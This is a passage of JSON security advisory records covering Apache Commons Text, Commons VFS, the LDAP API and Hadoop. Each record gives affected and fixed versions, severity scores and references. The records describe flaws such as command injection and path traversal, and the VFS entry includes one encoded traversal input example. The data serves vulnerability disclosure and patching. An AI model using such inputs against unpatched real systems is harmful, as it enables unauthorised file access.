"1.0.8.3-jre13", "1.0.8.3-jre14", "1.0.8.4", "1.0.8.4-jre12", "1.0.8.4-jre13", "1.0.8.4-jre14", "1.0.8.5", "1.0.8.5-jre12", "1.0.8.5-jre13", "1.0.8.5-jre14", "1.0.8.6-jre14", "1.0.9.0", "1.0.9.0-jre14", "1.0.9.1", "1.0.9.1-jre14", "1.0.9.10", "1.0.9.10-jre14", "1.0.9.11", "1.0.9.11-jre14", "1.0.9.13", "1.0.9.13-jre14", "1.0.9.14", "1.0.9.14-jre14", "1.0.9.2", "1.0.9.2-jre14", "1.0.9.3-jre14", "1.0.9.4-jre14", "1.0.9.5-jre14", "1.0.9.7-jre14", "1.1.0.0-jre15", "1.1.0.1", "1.1.0.1-jre14", "1.1.0.1-jre15", "1.1.0.2", "1.1.0.2-jre14", "1.1.0.2-jre15", "1.1.0.3", "1.1.0.3-jre14", "1.1.0.3-jre15", "1.1.0.3-jre8", "1.1.0.4-jre14", "1.1.0.4-jre15", "1.1.0.4-jre8", "1.1.0.5-jre14", "1.1.0.5-jre15", "1.1.0.6", "1.1.0.6-jre14", "1.1.0.6-jre15", "1.1.0.7", "1.1.0.7-jre14", "1.1.0.7-jre15", "1.1.0.7-jre8", "1.1.0.8-SNAPSHOT-jre14", "1.1.1.0", "1.1.1.0-SNAPSHOT-jre14", "1.1.1.0-SNAPSHOT-jre15", "1.1.1.0-SNAPSHOT-jre8", "1.1.1.0-jre14", "1.1.1.0-jre15", "1.1.1.0-jre8", "1.1.1.1-SP1", "1.1.1.1-jre14-SP1", "1.1.1.1-jre15-SP1", "1.1.1.2", "1.1.1.2-jre14", "1.1.1.2-jre15", "1.1.1.3", "1.1.1.3-jre14", "1.1.1.3-jre15", "1.1.1.3-jre16", "1.1.1.3-jre8", "1.1.1.4", "1.1.1.4-jre14", "1.1.1.4-jre15", "1.1.1.4-jre16", "1.1.1.4-jre8", "1.1.1.5-jre15", "1.1.1.7", "1.1.1.7-jre15", "1.1.1.7-jre16", "1.1.1.7-jre8", "1.1.1.8-jre15", "1.1.1.8-jre16", "1.1.1.9-jre15", "1.1.1.9-jre16", "1.2.0.0-jre16", "1.2.0.1-jre11", "1.2.0.1-jre15", "1.2.0.1-jre16", "1.2.0.2-jre16", "1.2.0.3-jre17-rc1", "1.2.1.1-jre17", "1.2.1.2-jre17", "1.2.2.1", "1.2.2.1-jre17" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-599f-7c49-w659/GHSA-599f-7c49-w659.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42889" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-text" }, { "type": "WEB", "url": "https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om" }, { "type": "WEB", "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0022" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202301-05" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221020-0004" }, { "type": "ADVISORY", "url": "https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/171003/OX-App-Suite-Cross-Site-Scripting-Server-Side-Request-Forgery.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/176650/Apache-Commons-Text-1.9-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2023/Feb/3" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/13/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/18/1" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2022-10-13T20:22:17Z", "nvd_published_at": "2022-10-13T13:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3936-3gx6-49c4", "published": "2025-03-23T15:30:33Z", "modified": "2025-03-25T03:50:54.932958Z", "aliases": [ "CVE-2025-30474" ], "summary": "Apache Commons VFS Exposure of Sensitive Information to an Unauthorized Actor", "details": "Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Commons VFS.\n\nThe FtpFileObject class can throw an exception when a file is not found, revealing the original URI in its message, which may include a password. The fix is to mask the password in the exception message\nThis issue affects Apache Commons VFS: before 2.10.0.\n\nUsers are recommended to upgrade to version 2.10.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-vfs2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-vfs2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.0" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.4.1", "2.5.0", "2.6.0", "2.7.0", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-3936-3gx6-49c4/GHSA-3936-3gx6-49c4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30474" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-vfs" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/VFS-169" }, { "type": "WEB", "url": "https://lists.apache.org/thread/w6ztgnbk6ccry3470x191g3xwrpgy6f4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/03/23/2" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2025-03-25T03:23:11Z", "nvd_published_at": "2025-03-23T15:15:14Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9q4x-fr4m-jp86", "published": "2025-03-23T15:30:33Z", "modified": "2025-04-03T01:24:03.415749Z", "aliases": [ "CVE-2025-27553" ], "summary": "Apache Commons VFS Has Relative Path Traversal Vulnerability", "details": "Relative Path Traversal vulnerability in Apache Commons VFS before 2.10.0.\n\nThe FileObject API in Commons VFS has a 'resolveFile' method that\ntakes a 'scope' parameter. Specifying 'NameScope.DESCENDENT' promises that \"an exception is thrown if the resolved file is not a descendent of\nthe base file\". However, when the path contains encoded \"..\"\ncharacters (for example, \"%2E%2E/bar.txt\"), it might return file objects that are not\na descendent of the base file, without throwing an exception.\nThis issue affects Apache Commons VFS: before 2.10.0.\n\nUsers are recommended to upgrade to version 2.10.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-vfs2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-vfs2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.0" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.4.1", "2.5.0", "2.6.0", "2.7.0", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-9q4x-fr4m-jp86/GHSA-9q4x-fr4m-jp86.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27553" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-vfs" }, { "type": "WEB", "url": "https://lists.apache.org/thread/cnzqowyw9r2pl263cylmxhnvh41hyjcb" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00006.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/03/23/1" } ], "database_specific": { "cwe_ids": [ "CWE-23" ], "github_reviewed": true, "github_reviewed_at": "2025-03-25T03:21:09Z", "nvd_published_at": "2025-03-23T15:15:13Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cx3q-cv6w-mx4h", "published": "2022-05-17T00:51:52Z", "modified": "2023-11-08T03:57:53.766909Z", "aliases": [ "CVE-2015-3250" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Directory LDAP API", "details": "Apache Directory LDAP API before 1.0.0-M31 allows attackers to conduct timing attacks via unspecified vectors.", "affected": [ { "package": { "name": "org.apache.directory.api:api-ldap-model", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.directory.api/api-ldap-model" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.0-M31" } ] } ], "versions": [ "1.0.0-M14", "1.0.0-M15", "1.0.0-M16", "1.0.0-M17", "1.0.0-M18", "1.0.0-M19", "1.0.0-M20", "1.0.0-M21", "1.0.0-M22", "1.0.0-M23", "1.0.0-M24", "1.0.0-M25", "1.0.0-M26", "1.0.0-M27", "1.0.0-M28", "1.0.0-M29", "1.0.0-M30" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.0-M30", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-cx3q-cv6w-mx4h/GHSA-cx3q-cv6w-mx4h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3250" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1241163" }, { "type": "WEB", "url": "http://directory.apache.org/api/#news_1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/07/07/11" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/07/07/5" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T20:17:29Z", "nvd_published_at": "2017-09-07T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7q56-mp4c-gggg", "published": "2022-05-17T03:35:31Z", "modified": "2023-11-08T03:58:31.207186Z", "aliases": [ "CVE-2016-5393" ], "summary": "Improper Access Control in Apache Hadoop", "details": "In Apache Hadoop 2.6.x before 2.6.5 and 2.7.x before 2.7.3, a remote user who can authenticate with the HDFS NameNode can possibly run arbitrary commands with the same privileges as the HDFS service.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6.0" }, { "fixed": "2.6.5" } ] } ], "versions": [ "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7q56-mp4c-gggg/GHSA-7q56-mp4c-gggg.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.3" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7q56-mp4c-gggg/GHSA-7q56-mp4c-gggg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5393" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/hadoop-general/201611.mbox/%3CCAA0W1bTbUmUUSF1rjRpX-2DvWutcrPt7TJSWUcSLg1F0gyHG1Q%40mail.gmail.com%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/94574" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:44:12Z", "nvd_published_at": "2016-11-29T06:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8r28-r8cp-g6cp", "published": "2022-05-13T01:08:56Z", "modified": "2023-11-08T03:58:30.347713Z", "aliases": [ "CVE-2016-5001" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Hadoop", "details": "This is an information disclosure vulnerability in Apache Hadoop before 2.6.4 and 2.7.x before 2.7.2 in the short-circuit reads feature of HDFS. A local user on an HDFS DataNode may be able to craft a block token that grants unauthorized read access to random files by guessing certain fields in the token.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.4" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8r28-r8cp-g6cp/GHSA-8r28-r8cp-g6cp.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.2" } ] } ], "versions": [ "2.7.0", "2.7.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8r28-r8cp-g6cp/GHSA-8r28-r8cp-g6cp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r66de86b9a608c1da70b2d27d765c11ec88edf6e5dd6f379ab33e072a@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "http://seclists.org/oss-sec/2016/q4/698" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:43:24Z", "nvd_published_at": "2017-08-30T19:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8wm5-8h9c-47pc", "published": "2022-08-05T00:00:24Z", "modified": "2024-02-21T05:29:29.300541Z", "aliases": [ "CVE-2022-25168" ], "summary": "Apache Hadoop argument injection vulnerability", "details": "Apache Hadoop's `FileUtil.unTar(File, File)` API does not escape the input file name before being passed to the shell. An attacker can inject arbitrary commands. This is only used in Hadoop 3.3 InMemoryAliasMap.completeBootstrapTransfer, which is only ever run by a local user. It has been used in Hadoop 2.x for yarn localization, which does enable remote code execution. It is used in Apache Spark, from the SQL command ADD ARCHIVE. As the ADD ARCHIVE command adds new binaries to the classpath, being able to execute shell scripts does not confer new permissions to the caller. SPARK-38305. \"Check existence of file before untarring/zipping\", which is included in 3.3.0, 3.1.4, 3.2.2, prevents shell commands being executed, regardless of which version of the hadoop libraries are in use. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.3 or upper (including HADOOP-18136).", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.10.2" } ] } ], "versions": [ "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.10.1", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-8wm5-8h9c-47pc/GHSA-8wm5-8h9c-47pc.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-alpha" }, { "fixed": "3.2.4" } ] } ], "versions": [ "3.0.0", "3.0.0-alpha1", "3.0.0-alpha2", "3.0.0-alpha3", "3.0.0-alpha4", "3.0.0-beta1", "3.0.1", "3.0.2", "3.0.3", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.2.0", "3.2.1", "3.2.2", "3.2.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-8wm5-8h9c-47pc/GHSA-8wm5-8h9c-47pc.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.3.0" }, { "fixed": "3.3.3" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-8wm5-8h9c-47pc/GHSA-8wm5-8h9c-47pc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25168" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/cae749b076f35f0be13a926ee8cfbb7ce4402746" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://lists.apache.org/thread/mxqnb39jfrwgs3j6phwvlrfq4mlox130" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220915-0007" } ], "database_specific": { "cwe_ids": [ "CWE-78", "CWE-88" ], "github_reviewed": true, "github_reviewed_at": "2022-08-11T21:14:19Z", "nvd_published_at": "2022-08-04T15:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9r7g-325h-mxrm", "published": "2022-05-17T02:53:20Z", "modified": "2023-11-08T03:57:32.986597Z", "aliases": [ "CVE-2014-0229" ], "summary": "Improper Authentication in Apache Hadoop", "details": "Apache Hadoop 0.23.x before 0.23.11 and 2.x before 2.4.1, as used in Cloudera CDH 5.0.x before 5.0.2, do not check authorization for the (1) refreshNamenodes, (2) deleteBlockPool, and (3) shutdownDatanode HDFS admin commands, which allows remote authenticated users to cause a denial of service (DataNodes shutdown) or perform unnecessary operations by issuing a command.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.23.0" }, { "fixed": "0.23.11" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9r7g-325h-mxrm/GHSA-9r7g-325h-mxrm.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.4.1" } ] } ], "versions": [ "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9r7g-325h-mxrm/GHSA-9r7g-325h-mxrm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0229" }, { "type": "WEB", "url": "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html#concept_i1q_xvk_2r" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T22:54:01Z", "nvd_published_at": "2017-03-23T20:59:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f5fw-25gw-5m92", "published": "2024-09-25T09:30:46Z", "modified": "2025-09-05T16:59:47.705794Z", "aliases": [ "CVE-2024-23454" ], "summary": "Apache Hadoop: Temporary File Local Information Disclosure", "details": "Apache Hadoop’s `RunJar.run()` does not set permissions for temporary directory by default. If sensitive data will be present in this file, all the other local users may be able to view the content. This is because, on unix-like systems, the system temporary directory is shared between all local users. As such, files written in this directory, without setting the correct posix permissions explicitly, may be viewable by all other local users.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.4.0" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.10.1", "2.10.2", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2", "3.0.0", "3.0.0-alpha1", "3.0.0-alpha2", "3.0.0-alpha3", "3.0.0-alpha4", "3.0.0-beta1", "3.0.1", "3.0.2", "3.0.3", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.2.0", "3.2.1", "3.2.2", "3.2.3", "3.2.4", "3.3.0", "3.3.1", "3.3.2", "3.3.3", "3.3.4", "3.3.5", "3.3.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-f5fw-25gw-5m92/GHSA-f5fw-25gw-5m92.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23454" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/8c2836402fbb2f619f1fef4ef625a8542e853a64" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HADOOP-19031" }, { "type": "WEB", "url": "https://lists.apache.org/thread/xlo7q8kn4tsjvx059r789oz19hzgfkfs" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241101-0002" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/09/25/1" } ], "database_specific": { "cwe_ids": [ "CWE-269", "CWE-378" ], "github_reviewed": true, "github_reviewed_at": "2024-09-25T14:31:09Z", "nvd_published_at": "2024-09-25T08:15:04Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f8vc-wfc8-hxqh", "published": "2022-02-09T22:17:38Z", "modified": "2024-03-08T05:20:12.847694Z", "aliases": [ "BIT-solr-2020-9492", "CVE-2020-9492" ], "summary": "Improper Privilege Management in Apache Hadoop", "details": "In Apache Hadoop 3.2.0 to 3.2.1, 3.0.0-alpha1 to 3.1.3, and 2.0.0-alpha to 2.10.0, WebHDFS client might send SPNEGO authorization header to remote URL without proper verification.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.2.0" }, { "fixed": "3.2.2" } ] } ], "versions": [ "3.2.0", "3.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-f8vc-wfc8-hxqh/GHSA-f8vc-wfc8-hxqh.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.4" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.1.0", "3.1.1", "3.1.2", "3.1.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-f8vc-wfc8-hxqh/GHSA-f8vc-wfc8-hxqh.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.10.1" } ] } ], "versions": [ "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-f8vc-wfc8-hxqh/GHSA-f8vc-wfc8-hxqh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9492" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/ca65409836d2949e9a9408d40bec0177b414cd5d" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210304-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4129c6b9e0410848bbd3761187ce9c19bc1cd491037b253007df99e@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca4516b00b55b347905df45e5d0432186248223f30497db87aba8710@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0057ebf32b646ab47f7f5744a8948332e015c39044cbb9d87ea76cd@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb12afaa421d483863c4175e42e5dbd0673917a3cff73f3fca4f8275f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r941e9be04efe0f455d20aeac88516c0848decd7e7b1d93d5687060f4@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9328eb49305e4cacc80e182bfd8a2efd8e640d940e24f5bfd7d5cb26@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79323adac584edab99fd5e4b52a013844b784a5d4b600da0662b33d6@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79201a209df9a4e7f761e537434131b4e39eabec4369a7d668904df4@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c2fa7949738e9d39606f1d7cd890c93a2633e3357c9aeaf886ea9a6@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6341f2a468ced8872a71997aa1786ce036242413484f0fa68dc9ca02@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", 